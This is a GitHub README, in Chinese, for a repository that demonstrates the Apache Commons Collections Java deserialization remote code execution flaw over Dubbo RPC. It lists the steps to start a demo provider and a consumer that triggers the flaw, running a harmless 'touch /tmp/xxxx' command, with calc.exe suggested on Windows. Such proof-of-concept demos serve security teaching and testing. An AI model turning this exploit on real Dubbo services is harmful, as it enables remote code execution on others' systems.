GitHub - javais/dubbo-apache-commons-collections-bug: 演示dubbo rpc Apache commons collections 的Java序列化漏洞

演示Apache Commons Collections远程代码执行漏洞，在dubbo rpc上验证。

漏洞演示

下载代码

git clone [email protected]:hengyunabc/dubbo-apache-commons-collections-bug.git

启动dubbo service server

cd dubbo-apache-commons-collections-bug
mvn exec:java -Dexec.mainClass="Provider"

启动dubbo client

cd dubbo-apache-commons-collections-bug
mvn exec:java -Dexec.mainClass="Consumer"

调用成功的话，可以发现多了 /tmp/xxxx 文件。

如果是windows，可以修改下代码，把 src/main/java/Consumer.java 里的command改为 calc.exe ：

                //windows下面可换为 calc.exe
                String command = "touch /tmp/xxxx";

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
src/main		src/main
README.md		README.md
mvnw		mvnw
mvnw.cmd		mvnw.cmd
pom.xml		pom.xml